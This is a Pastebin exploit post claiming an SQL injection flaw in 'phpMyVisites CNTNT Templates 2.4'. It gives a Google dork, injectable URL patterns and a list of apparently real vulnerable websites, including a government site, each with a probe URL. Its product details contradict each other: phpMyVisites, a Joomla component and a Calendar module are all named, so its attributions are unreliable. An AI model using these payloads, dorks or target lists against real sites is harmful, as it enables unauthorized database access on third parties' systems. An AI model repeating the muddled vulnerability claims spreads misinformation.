Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ####################################################################
- # Exploit Title : phpMyVisites CNTNT Templates 2.4 SQL Injection
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 14/02/2019
- # Vendor Homepage : phpmyvisites.net
- # Software Download Link : phpmyvisites.net/telechargements.html
- # Software Information Link : phpmyvisites.net/support.html
- # Software Affected Versions : 2.0 - 2.x - 2.1 - 2.2 - 2.2 beta - 2.4 and other all previous versions
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks : inurl:/index.php?mact=
- # Vulnerability Type : CWE-89 [ Improper Neutralization of
- Special Elements used in an SQL Command ('SQL Injection') ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- ####################################################################
- # Description about Software :
- ***************************
- phpMyVisites is open source software and content managment system.
- ####################################################################
- # Impact :
- ***********
- phpMyVisites CNTNT Calendar 2.4 and other versions -
- component for Joomla is prone to an SQL-injection vulnerability because it
- fails to sufficiently sanitize user-supplied data before using it in an SQL query.
- Exploiting this issue could allow an attacker to compromise the application,
- access or modify data, or exploit latent vulnerabilities in the underlying database.
- A remote attacker can send a specially crafted request to the vulnerable application
- and execute arbitrary SQL commands in application`s database.
- Further exploitation of this vulnerability may result in unauthorized data manipulation.
- An attacker can exploit this issue using a browser.
- ####################################################################
- # SQL Injection Exploit :
- **********************
- /index.php?mact=Search,cntnt01,dosearch,0&cntnt01returnid=[SQL Injection]
- /index.php?mact=News,cntnt01,print,0&cntnt01articleid=[ID-NUMBER]&cntnt01showtemplate=false&cntnt01returnid=[SQL Injection]
- /index.php?mact=News,cntnt01,rss&cntnt01showtemplate=false&cntnt01category=&cntnt01number=[ID-NUMBER]&cntnt01returnid=[SQL Injection]
- /index.php?mact=Calendar,cntnt01,default,1&cntnt01year=[YEAR-NUMBER]&cntnt01month=[ID-NUMBER]&cntnt01returnid=[ID-NUMBER]&page=[SQL Injection]
- /index.php?mact=Calendar,cntnt01,default,1&cntnt01year=[YEAR-NUMBER]&cntnt01month=[ID-NUMBER]&cntnt01returnid=[ID-NUMBER]&seite=[SQL Injection]
- /index.php?mact=Calendar,cntnt01,default,0&cntnt01event_id=[ID-NUMBER]&cntnt01display=event&cntnt01lang=en_GB&cntnt01detailpage=&cntnt01return_id=[ID-NUMBER]&cntnt01returnid=[SQL Injection]
- ####################################################################
- # Example Vulnerable Sites :
- *************************
- [+] richwoodtx.gov/index.php?mact=Calendar,cntnt01,default,0&cntnt01event_id=338&cntnt01display=event&cntnt01lang=en_GB&cntnt01detailpage=&cntnt01return_id=55&cntnt01returnid=55%27
- [+] iogkf.co.za/cms/index.php?mact=Calendar,cntnt01,default,1&cntnt01year=1955&cntnt01month=12&cntnt01returnid=15&page=15%27
- [+] fv-region-hannover.de/cms/index.php?mact=Calendar,cntnt01,default,1&cntnt01year=1730&cntnt01month=9&cntnt01returnid=15&seite=15%27
- [+] robertocapuzzo.it/cms/index.php?mact=News,cntnt01,rss&cntnt01showtemplate=false&cntnt01category=&cntnt01number=20&cntnt01returnid=39%27
- [+] esclerodermia.org/index.php?mact=News,cntnt01,rss&cntnt01showtemplate=false&cntnt01category=&cntnt01number=20&cntnt01returnid=61%27
- [+] personal.us.es/magdalen/index.php?mact=Search,cntnt01,dosearch,0&cntnt01returnid=60%27
- [+] bursalioglu.com.tr/index.php?mact=News,cntnt01,detail,0&cntnt01articleid=1&cntnt01origid=15&cntnt01returnid=51%27
- [+] nosss.vdu.lt/index.php?mact=News,cntnt01,rss&cntnt01showtemplate=false&cntnt01category=&cntnt01number=20&cntnt01returnid=15%27
- [+] viialanperhokalastajat.net/index.php?mact=News,cntnt01,print,0&cntnt01articleid=32&cntnt01showtemplate=false&cntnt01returnid=57%27
- [+] unvbeauty.com/index.php?mact=Services,cntnt01,detail,0&cntnt01item_id=3&cntnt01detailtemplate=&cntnt01returnid=18%27
- [+] deondernemervertelt.nl/index.php?mact=News,cntnt01,detail,0&cntnt01articleid=1&cntnt01returnid=15%27
- ####################################################################
- # Example SQL Database Error :
- ****************************
- Warning: Parameter 1 to cms_module_Lang() expected to be a
- reference, value given in /www/htdocs/w009d2d2/cms
- /lib/classes/class.module.inc.php on line 2003
- Deprecated: Function eregi_replace() is deprecated in
- /home/iogkfco/public_html/cms/include.php on line 252
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
Add Comment
Please, Sign In to add comment